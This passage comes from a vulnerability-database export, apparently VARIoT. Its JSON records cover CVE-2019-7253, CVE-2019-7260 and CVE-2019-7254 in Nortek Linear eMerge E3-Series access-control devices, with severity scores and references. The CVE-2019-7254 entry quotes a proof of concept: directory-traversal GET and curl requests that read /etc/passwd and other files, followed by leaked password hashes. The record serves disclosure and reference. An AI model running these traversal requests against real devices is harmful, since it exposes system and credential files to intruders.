"@container": "@list"
}
},
"data": [
{
"date": "2019-07-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21272"
},
{
"date": "2019-07-03T00:00:00",
"db": "VULHUB",
"id": "VHN-158688"
},
{
"date": "2024-03-07T07:09:00",
"db": "JVNDB",
"id": "JVNDB-2019-005907"
},
{
"date": "2019-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-110"
},
{
"date": "2019-07-03T17:19:15.327000",
"db": "NVD",
"id": "CVE-2019-7253"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-110"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Path traversal vulnerability in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005907"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-110"
}
],
"trust": 0.6
}
}
VAR-201907-0161
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices have Cleartext Credentials in a Database. Linear eMerge E3 series devices contain a vulnerability related to certificate/password management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.
Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. Attackers can use this vulnerability to obtain clear text passwords and launch further attacks on the system. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0161",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"cve": "CVE-2019-7260",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7260",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34631",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158695",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7260",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7260",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34631",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-103",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158695",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "VULHUB",
"id": "VHN-158695"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-103"
},
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices have Cleartext Credentials in a Database. Linear eMerge E3 series devices contain a vulnerability related to certificate/password management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. Attackers can use this vulnerability to obtain clear text passwords and launch further attacks on the system. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7260"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "VULHUB",
"id": "VHN-158695"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7260",
"trust": 3.9
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-103",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34631",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158695",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "VULHUB",
"id": "VHN-158695"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-103"
},
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"id": "VAR-201907-0161",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "VULHUB",
"id": "VHN-158695"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
}
]
},
"last_update_date": "2024-03-18T22:23:59.365000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "Certificate/password management (CWE-255) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-255",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158695"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7260"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "VULHUB",
"id": "VHN-158695"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-103"
},
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"db": "VULHUB",
"id": "VHN-158695"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-103"
},
{
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158695"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-103"
},
{
"date": "2019-07-02T18:15:12.017000",
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34631"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158695"
},
{
"date": "2024-03-07T08:19:00",
"db": "JVNDB",
"id": "JVNDB-2019-006016"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-103"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-7260"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-103"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to certificate/password management in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006016"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-103"
}
],
"trust": 0.6
}
}
VAR-201907-0155
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow File Inclusion. Linear eMerge E3 Series devices contain vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. A security vulnerability exists in Nortek Security & Control Linear eMerge E3-Series. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure Affected version: <=1.00-06 CVE: CVE-2019-7254 Advisory: https://applied-risk.com/resources/ar-2019-005
by Gjoko 'LiquidWorm' Krstic
GET /?c=../../../../../../etc/passwd%00 Host: 192.168.1.2
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0155",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "PACKETSTORM",
"id": "155252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
}
],
"trust": 0.7
},
"cve": "CVE-2019-7254",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7254",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-158689",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-7254",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7254",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7254",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-114",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-158689",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-7254",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158689"
},
{
"db": "VULMON",
"id": "CVE-2019-7254"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006012"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-114"
},
{
"db": "NVD",
"id": "CVE-2019-7254"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
